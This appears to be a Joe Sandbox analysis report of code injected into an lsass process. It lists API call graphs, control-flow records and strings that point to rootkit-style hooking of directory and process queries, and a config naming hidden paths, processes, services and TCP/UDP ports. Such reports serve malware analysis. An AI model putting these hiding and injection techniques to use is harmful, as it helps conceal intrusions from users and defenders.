RtlPcToFileHeader 8743->8744 8745 202c0ae8ea2 RaiseException 8743->8745 8746 202c0ae8e98 8744->8746 8745->8737 8746->8745 8748 202c0ae4367 8747->8748 8749 202c0ae4344 8747->8749 8752 202c0ae439d 8748->8752 8767 202c0ae3f00 8748->8767 8749->8748 8761 202c0ae3dd0 8749->8761 8755 202c0ae3f00 2 API calls 8752->8755 8759 202c0ae43cd 8752->8759 8753 202c0ae4403 8754 202c0ae441f 8753->8754 8757 202c0ae3dd0 3 API calls 8753->8757 8758 202c0ae443b 8754->8758 8760 202c0ae3f00 2 API calls 8754->8760 8755->8759 8756 202c0ae3dd0 3 API calls 8756->8753 8757->8754 8758->8727 8759->8753 8759->8756 8760->8758 8766 202c0ae3df1 _invalid_parameter_noinfo 8761->8766 8762 202c0ae3e60 8762->8748 8763 202c0ae3e46 VirtualQuery 8763->8762 8763->8766 8764 202c0ae3e7a VirtualAlloc 8764->8762 8765 202c0ae3eab GetLastError 8764->8765 8765->8766 8766->8762 8766->8763 8766->8764 8768 202c0ae3f18 _invalid_parameter_noinfo 8767->8768 8769 202c0ae3f6d VirtualQuery 8768->8769 8770 202c0ae3f87 8768->8770 8771 202c0ae3fd2 GetLastError 8768->8771 8769->8768 8769->8770 8770->8752 8771->8768 8771->8770 8773 202c0ae761b 8772->8773 8774 202c0ae7631 SetLastError 8773->8774 8775 202c0ae763f 8773->8775 8774->8775 8775->8732 8305 202c0aed2a4 8306 202c0aed2ac 8305->8306 8308 202c0aed2dd 8306->8308 8309 202c0aed2d9 8306->8309 8311 202c0aeff5c 8306->8311 8316 202c0aed308 8308->8316 8312 202c0aefce4 5 API calls 8311->8312 8313 202c0aeff92 8312->8313 8314 202c0aeffb1 InitializeCriticalSectionAndSpinCount 8313->8314 8315 202c0aeff97 8313->8315 8314->8315 8315->8306 8317 202c0aed333 8316->8317 8318 202c0aed337 8317->8318 8319 202c0aed316 DeleteCriticalSection 8317->8319 8318->8309 8319->8317 9110 202c0aef9a4 GetCommandLineA GetCommandLineW 8320 202c0aec4c1 8332 202c0aecff8 8320->8332 8333 202c0aed778 _invalid_parameter_noinfo 23 API calls 8332->8333 8334 202c0aed001 8333->8334 9111 202c0ae23c0 9113 202c0ae243e _invalid_parameter_noinfo 9111->9113 9112 202c0ae255b 9113->9112 9114 202c0ae24a3 GetFileType 9113->9114 9115 202c0ae24b1 StrCpyW 9114->9115 9116 202c0ae24c5 9114->9116 9120 202c0ae24d2 9115->9120 9117 202c0ae19e0 4 API calls 9116->9117 9117->9120 9118 202c0ae3c40 StrCmpNIW 9118->9120 9119 202c0ae32d8 4 API calls 9119->9120 9120->9112 9120->9118 9120->9119 9121 202c0ae1ce0 2 API calls 9120->9121 9121->9120 9401 202c0af0540 9404 202c0af04f8 9401->9404 9409 202c0aed2ec EnterCriticalSection 9404->9409 7713 202c0ae193c OpenProcess 7714 202c0ae1970 K32GetModuleFileNameExW 7713->7714 7715 202c0ae19c2 7713->7715 7716 202c0ae198a PathFindFileNameW lstrlenW 7714->7716 7717 202c0ae19b9 CloseHandle 7714->7717 7716->7717 7718 202c0ae19a8 StrCpyW 7716->7718 7717->7715 7718->7717 9410 202c0ae2b3c 9412 202c0ae2b99 9410->9412 9411 202c0ae2bb4 9412->9411 9413 202c0ae3478 3 API calls 9412->9413 9413->9411 9414 202c0ae593d 9415 202c0ae5944 9414->9415 9416 202c0ae59ab 9415->9416 9417 202c0ae5a27 VirtualProtect 9415->9417 9418 202c0ae5a61 9417->9418 9419 202c0ae5a53 GetLastError 9417->9419 9419->9418 9420 202c0af013c 9421 202c0af0175 9420->9421 9422 202c0af0146 9420->9422 9422->9421 9423 202c0af015b FreeLibrary 9422->9423 9423->9422 8335 202c0af60b8 8338 202c0aebbd8 8335->8338 8339 202c0aebc3f 8338->8339 8340 202c0aebbf2 8338->8340 8340->8339 8342 202c0ae8fe4 8340->8342 8345 202c0ae9000 8342->8345 8344 202c0ae8fed 8344->8339 8346 202c0ae901f GetLastError 8345->8346 8347 202c0ae9018 8345->8347 8357 202c0aea708 8346->8357 8347->8344 8361 202c0aea528 8357->8361 8362 202c0aea612 TlsGetValue 8361->8362 8367 202c0aea56c __vcrt_InitializeCriticalSectionEx 8361->8367 8363 202c0aea59a LoadLibraryExW 8365 202c0aea5bb GetLastError 8363->8365 8366 202c0aea639 8363->8366 8364 202c0aea659 GetProcAddress 8364->8362 8365->8367 8366->8364 8368 202c0aea650 FreeLibrary 8366->8368 8367->8362 8367->8363 8367->8364 8369 202c0aea5dd LoadLibraryExW 8367->8369 8368->8364 8369->8366 8369->8367 9122 202c0af0bb8 9123 202c0af0be2 9122->9123 9124 202c0aee01c __std_exception_copy 11 API calls 9123->9124 9125 202c0af0c01 9124->9125 9126 202c0aee094 __free_lconv_mon 11 API calls 9125->9126 9127 202c0af0c0f 9126->9127 9128 202c0aee01c __std_exception_copy 11 API calls 9127->9128 9132 202c0af0c39 9127->9132 9129 202c0af0c2b 9128->9129 9131 202c0aee094 __free_lconv_mon 11 API calls 9129->9131 9130 202c0aeff5c 6 API calls 9130->9132 9131->9132 9132->9130 9133 202c0af0c42 9132->9133 8787 202c0aeca34 8788 202c0aeca4d 8787->8788 8789 202c0aeca49 8787->8789 8790 202c0aef5e0 69 API calls 8788->8790 8791 202c0aeca52 8790->8791 8802 202c0aefb3c GetEnvironmentStringsW 8791->8802 8794 202c0aeca5f 8796 202c0aee094 __free_lconv_mon 11 API calls 8794->8796 8795 202c0aeca6b 8822 202c0aecaa8 8795->8822 8796->8789 8799 202c0aee094 __free_lconv_mon 11 API calls 8800 202c0aeca92 8799->8800 8801 202c0aee094 __free_lconv_mon 11 API calls 8800->8801 8801->8789 8803 202c0aeca57 8802->8803 8804 202c0aefb6c 8802->8804 8803->8794 8803->8795 8804->8804 8805 202c0aefa5c WideCharToMultiByte 8804->8805 8806 202c0aefbbd 8805->8806 8807 202c0aefbc4 FreeEnvironmentStringsW 8806->8807 8808 202c0aed35c 12 API calls 8806->8808 8807->8803 8809 202c0aefbd7 8808->8809 8810 202c0aefbdf 8809->8810 8811 202c0aefbe8 8809->8811 8812 202c0aee094 __free_lconv_mon 11 API calls 8810->8812 8813 202c0aefa5c WideCharToMultiByte 8811->8813 8814 202c0aefbe6 8812->8814 8815 202c0aefc0b 8813->8815 8814->8807 8816 202c0aefc0f 8815->8816 8817 202c0aefc19 8815->8817 8818 202c0aee094 __free_lconv_mon 11 API calls 8816->8818 8819 202c0aee094 __free_lconv_mon 11 API calls 8817->8819 8820 202c0aefc17 FreeEnvironmentStringsW 8818->8820 8819->8820 8820->8803 8823 202c0aecacd 8822->8823 8824 202c0aee01c __std_exception_copy 11 API calls 8823->8824 8835 202c0aecb03 8824->8835 8825 202c0aecb0b 8826 202c0aee094 __free_lconv_mon 11 API calls 8825->8826 8827 202c0aeca73 8826->8827 8827->8799 8828 202c0aecb7e 8829 202c0aee094 __free_lconv_mon 11 API calls 8828->8829 8829->8827 8830 202c0aee01c __std_exception_copy 11 API calls 8830->8835 8831 202c0aecb6d 8833 202c0aecbb8 11 API calls 8831->8833 8832 202c0aed038 __std_exception_copy 49 API calls 8832->8835 8834 202c0aecb75 8833->8834 8837 202c0aee094 __free_lconv_mon 11 API calls 8834->8837 8835->8825 8835->8828 8835->8830 8835->8831 8835->8832 8836 202c0aecba3 8835->8836 8838 202c0aee094 __free_lconv_mon 11 API calls 8835->8838 8839 202c0aedee0 _invalid_parameter_noinfo 17 API calls 8836->8839 8837->8825 8838->8835 8840 202c0aecbb6 8839->8840 9134 202c0aed5b4 9135 202c0aed5b9 9134->9135 9136 202c0aed5ce 9134->9136 9140 202c0aed5d4 9135->9140 9141 202c0aed616 9140->9141 9142 202c0aed61e 9140->9142 9144 202c0aee094 __free_lconv_mon 11 API calls 9141->9144 9143 202c0aee094 __free_lconv_mon 11 API calls 9142->9143 9145 202c0aed62b 9143->9145 9144->9142 9146 202c0aee094 __free_lconv_mon 11 API calls 9145->9146 9147 202c0aed638 9146->9147 9148 202c0aee094 __free_lconv_mon 11 API calls 9147->9148 9149 202c0aed645 9148->9149 9150 202c0aee094 __free_lconv_mon 11 API calls 9149->9150 9151 202c0aed652 9150->9151 9152 202c0aee094 __free_lconv_mon 11 API calls 9151->9152 9153 202c0aed65f 9152->9153 9154 202c0aee094 __free_lconv_mon 11 API calls 9153->9154 9155 202c0aed66c 9154->9155 9156 202c0aee094 __free_lconv_mon 11 API calls 9155->9156 9157 202c0aed679 9156->9157 9158 202c0aee094 __free_lconv_mon 11 API calls 9157->9158 9159 202c0aed689 9158->9159 9160 202c0aee094 __free_lconv_mon 11 API calls 9159->9160 9161 202c0aed699 9160->9161 9166 202c0aed484 9161->9166 9180 202c0aed2ec EnterCriticalSection 9166->9180 9424 202c0ae8332 9425 202c0ae8d80 __std_exception_copy 49 API calls 9424->9425 9426 202c0ae835d 9425->9426 8370 202c0ae3090 8371 202c0ae30c0 8370->8371 8372 202c0ae3179 8371->8372 8373 202c0ae30dd PdhGetCounterInfoW 8371->8373 8373->8372 8374 202c0ae30fb GetProcessHeap HeapAlloc PdhGetCounterInfoW 8373->8374 8375 202c0ae312d StrCmpW 8374->8375 8376 202c0ae3165 GetProcessHeap HeapFree 8374->8376 8375->8376 8377 202c0ae3142 8375->8377 8376->8372 8377->8376 8379 202c0ae3520 StrCmpNW 8377->8379 8380 202c0ae3552 StrStrW 8379->8380 8383 202c0ae35c2 8379->8383 8381 202c0ae356b StrToIntW 8380->8381 8380->8383 8382 202c0ae3593 8381->8382 8381->8383 8382->8383 8389 202c0ae193c OpenProcess 8382->8389 8383->8377 8386 202c0ae3c40 StrCmpNIW 8387 202c0ae35b4 8386->8387 8387->8383 8388 202c0ae1c08 2 API calls 8387->8388 8388->8383 8390 202c0ae1970 K32GetModuleFileNameExW 8389->8390 8391 202c0ae19c2 8389->8391 8392 202c0ae198a PathFindFileNameW lstrlenW 8390->8392 8393 202c0ae19b9 CloseHandle 8390->8393 8391->8383 8391->8386 8392->8393 8394 202c0ae19a8 StrCpyW 8392->8394 8393->8391 8394->8393 8395 202c0af1490 8396 202c0af14bd 8395->8396 8397 202c0aedffc __std_exception_copy 11 API calls 8396->8397 8402 202c0af14d2 8396->8402 8398 202c0af14c7 8397->8398 8399 202c0aedec0 _invalid_parameter_noinfo 49 API calls 8398->8399 8399->8402 8400 202c0ae7d30 _log10_special 8 API calls 8401 202c0af1890 8400->8401 8402->8400 9188 202c0af0590 9189 202c0af05c0 9188->9189 9190 202c0af05e7 9188->9190 9189->9190 9191 202c0aed8f0 __std_exception_copy 11 API calls 9189->9191 9194 202c0af05d4 9189->9194 9192 202c0af06bc 9190->9192 9211 202c0aed2ec EnterCriticalSection 9190->9211 9191->9194 9196 202c0af0723 9192->9196 9197 202c0af06ea 9192->9197 9199 202c0af07f0 9192->9199 9194->9190 9195 202c0af0669 9194->9195 9206 202c0af0624 9194->9206 9200 202c0aedffc __std_exception_copy 11 API calls 9195->9200 9209 202c0af0781 9196->9209 9212 202c0aed340 LeaveCriticalSection 9196->9212 9197->9196 9205 202c0aed778 _invalid_parameter_noinfo 23 API calls 9197->9205 9198 202c0af07fd 9199->9198 9213 202c0aed340 LeaveCriticalSection 9199->9213 9203 202c0af066e 9200->9203 9204 202c0aedec0 _invalid_parameter_noinfo 49 API calls 9203->9204 9204->9206 9207 202c0af0713 9205->9207 9208 202c0aed778 _invalid_parameter_noinfo 23 API calls 9207->9208 9208->9196 9210 202c0aed778 23 API calls _invalid_parameter_noinfo 9209->9210 9210->9209 9214 202c0af1990 9215 202c0af19af 9214->9215 9216 202c0af1a28 9215->9216 9219 202c0af19bf 9215->9219 9222 202c0ae85dc 9216->9222 9220 202c0ae7d30 _log10_special 8 API calls 9219->9220 9221 202c0af1a1e 9220->9221 9225 202c0ae85f0 IsProcessorFeaturePresent 9222->9225 9226 202c0ae8607 9225->9226 9231 202c0ae868c RtlCaptureContext RtlLookupFunctionEntry 9226->9231 9232 202c0ae861b 9231->9232 9233 202c0ae86bc RtlVirtualUnwind 9231->9233 9234 202c0ae84d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9232->9234 9233->9232 9427 202c0ae7f0c 9428 202c0ae7f30 __scrt_release_startup_lock 9427->9428 9429 202c0aec235 9428->9429 9430 202c0aed8f0 __std_exception_copy 11 API calls 9428->9430 9431 202c0aec25e 9430->9431 8403 202c0aece84 8406 202c0aecc34 8403->8406 8413 202c0aecbfc 8406->8413 8414 202c0aecc11 8413->8414 8415 202c0aecc0c 8413->8415 8417 202c0aecc18 8414->8417 8416 202c0aecbb8 11 API calls 8415->8416 8416->8414 8418 202c0aecc2d 8417->8418 8419 202c0aecc28 8417->8419 8421 202c0aecbb8 8418->8421 8420 202c0aecbb8 11 API calls 8419->8420 8420->8418 8422 202c0aecbbd 8421->8422 8423 202c0aecbee 8421->8423 8424 202c0aecbe6 8422->8424 8425 202c0aee094 __free_lconv_mon 11 API calls 8422->8425 8426 202c0aee094 __free_lconv_mon 11 API calls 8424->8426 8425->8422 8426->8423 9235 202c0af03a0 9246 202c0aed2ec EnterCriticalSection 9235->9246 8841 202c0ae7c1c 8842 202c0ae7c3d 8841->8842 8843 202c0ae7c38 8841->8843 8845 202c0ae7d50 8843->8845 8846 202c0ae7de7 8845->8846 8847 202c0ae7d73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8845->8847 8846->8842 8847->8846 7719 202c0aee01c 7724 202c0aee02d __std_exception_copy 7719->7724 7720 202c0aee07e 7729 202c0aedffc 7720->7729 7721 202c0aee062 RtlAllocateHeap 7722 202c0aee07c 7721->7722 7721->7724 7724->7720 7724->7721 7726 202c0aec1ac 7724->7726 7732 202c0aec1ec 7726->7732 7738 202c0aed8f0 GetLastError 7729->7738 7731 202c0aee005 7731->7722 7737 202c0aed2ec EnterCriticalSection 7732->7737 7739 202c0aed931 FlsSetValue 7738->7739 7740 202c0aed914 7738->7740 7741 202c0aed943 7739->7741 7752 202c0aed921 SetLastError 7739->7752 7740->7739 7740->7752 7755 202c0aee01c 7741->7755 7745 202c0aed970 FlsSetValue 7747 202c0aed98e 7745->7747 7748 202c0aed97c FlsSetValue 7745->7748 7746 202c0aed960 FlsSetValue 7749 202c0aed969 7746->7749 7768 202c0aed4e4 7747->7768 7748->7749 7762 202c0aee094 7749->7762 7752->7731 7760 202c0aee02d __std_exception_copy 7755->7760 7756 202c0aee07e 7759 202c0aedffc __std_exception_copy 10 API calls 7756->7759 7757 202c0aee062 RtlAllocateHeap 7758 202c0aed952 7757->7758 7757->7760 7758->7745 7758->7746 7759->7758 7760->7756 7760->7757 7761 202c0aec1ac __std_exception_copy 2 API calls 7760->7761 7761->7760 7763 202c0aee0ca 7762->7763 7764 202c0aee099 HeapFree 7762->7764 7763->7752 7764->7763 7765 202c0aee0b4 GetLastError 7764->7765 7766 202c0aee0c1 __free_lconv_mon 7765->7766 7767 202c0aedffc __std_exception_copy 9 API calls 7766->7767 7767->7763 7773 202c0aed3bc 7768->7773 7785 202c0aed2ec EnterCriticalSection 7773->7785 9432 202c0aecf1c 9433 202c0aee094 __free_lconv_mon 11 API calls 9432->9433 9434 202c0aecf2c 9433->9434 9435 202c0aee094 __free_lconv_mon 11 API calls 9434->9435 9436 202c0aecf40 9435->9436 9437 202c0aee094 __free_lconv_mon 11 API calls 9436->9437 9438 202c0aecf54 9437->9438 9439 202c0aee094 __free_lconv_mon 11 API calls 9438->9439 9440 202c0aecf68 9439->9440 8427 202c0ae2898 8429 202c0ae28de 8427->8429 8428 202c0ae2944 8429->8428 8430 202c0ae3c40 StrCmpNIW 8429->8430 8430->8429 8848 202c0af6015 8849 202c0ae8fe4 _CallSETranslator 9 API calls 8848->8849 8850 202c0af602d 8849->8850 8851 202c0ae8fe4 _CallSETranslator 9 API calls 8850->8851 8852 202c0af6048 8851->8852 8853 202c0ae8fe4 _CallSETranslator 9 API calls 8852->8853 8854 202c0af605c 8853->8854 8855 202c0ae8fe4 _CallSETranslator 9 API calls 8854->8855 8856 202c0af609e 8855->8856 8431 202c0ae6093 8432 202c0ae60a0 8431->8432 8433 202c0ae60ac GetThreadContext 8432->8433 8439 202c0ae620a 8432->8439 8434 202c0ae60d2 8433->8434 8433->8439 8434->8439 8441 202c0ae60f9 8434->8441 8435 202c0ae617d 8436 202c0ae6231 VirtualProtect FlushInstructionCache 8436->8439 8437 202c0ae62ee 8438 202c0ae630e 8437->8438 8449 202c0ae47d0 8437->8449 8453 202c0ae51e0 GetCurrentProcess 8438->8453 8439->8436 8439->8437 8441->8435 8444 202c0ae6156 SetThreadContext 8441->8444 8443 202c0ae6313 8445 202c0ae6367 8443->8445 8446 202c0ae6327 ResumeThread 8443->8446 8444->8435 8447 202c0ae7d30 _log10_special 8 API calls 8445->8447 8446->8443 8448 202c0ae63af 8447->8448 8451 202c0ae47ec 8449->8451 8450 202c0ae484f 8450->8438 8451->8450 8452 202c0ae4802 VirtualFree 8451->8452 8452->8451 8454 202c0ae51fc 8453->8454 8455 202c0ae5212 VirtualProtect FlushInstructionCache 8454->8455 8456 202c0ae5243 8454->8456 8455->8454 8456->8443

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 62 202c0ae25cc-202c0ae2650 NtQueryDirectoryFileEx 63 202c0ae2656-202c0ae2659 62->63 64 202c0ae2874-202c0ae2897 62->64 63->64 65 202c0ae265f-202c0ae266d 63->65 65->64 66 202c0ae2673-202c0ae26b9 call 202c0af5b10 * 3 GetFileType 65->66 73 202c0ae26d1-202c0ae26db call 202c0ae19e0 66->73 74 202c0ae26bb-202c0ae26cf StrCpyW 66->74 75 202c0ae26e0-202c0ae26e4 73->75 74->75 77 202c0ae27d1-202c0ae27ea call 202c0ae333c call 202c0ae3c40 75->77 78 202c0ae26ea-202c0ae26ef 75->78 91 202c0ae2781-202c0ae27cb 77->91 92 202c0ae27ec-202c0ae281b call 202c0ae333c call 202c0ae32d8 call 202c0ae1ce0 77->92 80 202c0ae26f2-202c0ae26f7 78->80 82 202c0ae26f9-202c0ae26fc 80->82 83 202c0ae2714 80->83 82->83 86 202c0ae26fe-202c0ae2701 82->86 84 202c0ae2717-202c0ae2730 call 202c0ae333c call 202c0ae3c40 83->84 100 202c0ae2736-202c0ae2765 call 202c0ae333c call 202c0ae32d8 call 202c0ae1ce0 84->100 101 202c0ae2823-202c0ae2825 84->101 86->83 89 202c0ae2703-202c0ae2706 86->89 89->83 93 202c0ae2708-202c0ae270b 89->93 91->64 91->77 92->91 117 202c0ae2821 92->117 93->83 96 202c0ae270d-202c0ae2712 93->96 96->83 96->84 100->101 123 202c0ae276b-202c0ae2776 100->123 105 202c0ae2846-202c0ae2849 101->105 106 202c0ae2827-202c0ae2841 101->106 107 202c0ae284b-202c0ae2851 105->107 108 202c0ae2853-202c0ae2856 105->108 106->80 107->64 111 202c0ae2871 108->111 112 202c0ae2858-202c0ae285b 108->112 111->64 112->111 115 202c0ae285d-202c0ae2860 112->115 115->111 118 202c0ae2862-202c0ae2865 115->118 117->64 118->111 120 202c0ae2867-202c0ae286a 118->120 120->111 122 202c0ae286c-202c0ae286f 120->122 122->64 122->111 123->80 124 202c0ae277c 123->124 124->64
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryQueryType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 4175507832-91387939
                                                  • Opcode ID: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction ID: be2c09dabdac7819cb2871a395dfba8bf9fd3a4356c0bc1ffdfd4bc472bffbf9
                                                  • Opcode Fuzzy Hash: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction Fuzzy Hash: 5E71BF326007C1C6FB68DF2598DC3AE67A4F785B84F460127DFA987B8ADE34C6588740

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 126 202c0ae20e4-202c0ae211e NtQuerySystemInformation 127 202c0ae2120-202c0ae2124 126->127 128 202c0ae2127-202c0ae212a 126->128 127->128 129 202c0ae2130-202c0ae2133 128->129 130 202c0ae22db-202c0ae22fb 128->130 131 202c0ae222b-202c0ae222e 129->131 132 202c0ae2139-202c0ae214b 129->132 134 202c0ae2230-202c0ae224a call 202c0ae3198 131->134 135 202c0ae229f-202c0ae22a2 131->135 132->130 133 202c0ae2151-202c0ae215d 132->133 136 202c0ae215f-202c0ae216f 133->136 137 202c0ae218b-202c0ae2196 call 202c0ae1bd0 133->137 134->130 147 202c0ae2250-202c0ae2266 134->147 135->130 138 202c0ae22a4-202c0ae22b7 call 202c0ae3198 135->138 136->137 140 202c0ae2171-202c0ae2189 StrCmpNIW 136->140 144 202c0ae21b7-202c0ae21c9 137->144 150 202c0ae2198-202c0ae21b0 call 202c0ae1c3c 137->150 138->130 149 202c0ae22b9-202c0ae22c1 138->149 140->137 140->144 151 202c0ae21cb-202c0ae21cd 144->151 152 202c0ae21d9-202c0ae21db 144->152 147->130 148 202c0ae2268-202c0ae2284 147->148 153 202c0ae2288-202c0ae229b 148->153 149->130 156 202c0ae22c3-202c0ae22cb 149->156 150->144 166 202c0ae21b2-202c0ae21b5 150->166 158 202c0ae21cf-202c0ae21d2 151->158 159 202c0ae21d4-202c0ae21d7 151->159 154 202c0ae21dd-202c0ae21e0 152->154 155 202c0ae21e2 152->155 153->153 161 202c0ae229d 153->161 160 202c0ae21e5-202c0ae21e8 154->160 155->160 162 202c0ae22ce-202c0ae22d9 156->162 158->160 159->160 164 202c0ae21ea-202c0ae21f0 160->164 165 202c0ae21f6-202c0ae21f9 160->165 161->130 162->130 162->162 164->133 164->165 165->130 167 202c0ae21ff-202c0ae2203 165->167 166->160 168 202c0ae221a-202c0ae2226 167->168 169 202c0ae2205-202c0ae2208 167->169 168->130 169->130 170 202c0ae220e-202c0ae2213 169->170 170->167 171 202c0ae2215 170->171 171->130
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL ref: 00000202C0AE210F
                                                  • StrCmpNIW.SHLWAPI ref: 00000202C0AE217E
                                                    • Part of subcall function 00000202C0AE3198: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE22B5), ref: 00000202C0AE31BB
                                                    • Part of subcall function 00000202C0AE3198: HeapAlloc.KERNEL32(?,?,?,?,?,00000202C0AE22B5), ref: 00000202C0AE31CE
                                                    • Part of subcall function 00000202C0AE3198: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000202C0AE22B5), ref: 00000202C0AE3243
                                                    • Part of subcall function 00000202C0AE3198: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE22B5), ref: 00000202C0AE32A9
                                                    • Part of subcall function 00000202C0AE3198: HeapFree.KERNEL32(?,?,?,?,?,00000202C0AE22B5), ref: 00000202C0AE32B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                  • String ID: S
                                                  • API String ID: 722747020-543223747
                                                  • Opcode ID: ababc06f2218445ebb93a87e2cca1c7b2ad7387c698c2459648cdcaebc8943bf
                                                  • Instruction ID: 1c04f6208095d24d7622fa9767e017ed044ff4f791f134c9e9af56b94586bd0b
                                                  • Opcode Fuzzy Hash: ababc06f2218445ebb93a87e2cca1c7b2ad7387c698c2459648cdcaebc8943bf
                                                  • Instruction Fuzzy Hash: 2B518E32B10BA4C6FB60CF2598CC7AD63A4F714794F168527DFA652B86DB35C9A9C300

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$AllocateEnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\x4config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 959270475-1036178600
                                                  • Opcode ID: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction ID: 488dde6abd1ab1aef738a26e6f70213d2ceded02ecf775d36df9ac4f78703e00
                                                  • Opcode Fuzzy Hash: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction Fuzzy Hash: B471E536210B50C6FB109F65E8DC69D23A5FB88F98F421123DB9E47A6ADE39C568C740

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction ID: 83811c85df791a93b817c534fb1f30716894385f6b1eed4f315b2212decaf130
                                                  • Opcode Fuzzy Hash: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction Fuzzy Hash: CB015732300B80C2FA10DB52A89CB5D62A1FB88FC0F494137DF9A43796DE39CA99C740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction ID: 3edc574432247fdbbefa36f92c4cdaf47cd9d88596031d85919346c1b4774ebb
